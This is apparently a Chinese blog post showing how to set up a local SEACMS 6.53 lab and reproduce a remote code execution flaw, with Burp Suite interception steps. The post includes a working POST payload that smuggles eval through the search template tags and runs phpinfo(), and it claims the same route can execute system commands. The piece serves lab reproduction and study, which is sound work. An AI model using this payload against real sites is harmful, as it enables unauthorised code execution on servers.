海洋CMS(SEACMS 6.53)环境搭建及漏洞利用

0x00搭建环境

mysql+php   用phpstudy即可

海洋6.53:https://pan.baidu.com/s/1Fk3G8KLMx8SEuXrU3iiqdQ 提取码:Bi6U  

下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中

包里有安装说明

 

0x01 开始复现

安装完毕后进入主页

 

设置代理127.0.0.1 8080端口, 打开BurpSuite抓包

 

这里直接用网上的poc  

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

我们复制过来看看效果

 

改好直接forward 过我们看下效果

 

0x02 漏洞利用

进一步利用,可以执行系统命令

 

 

评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值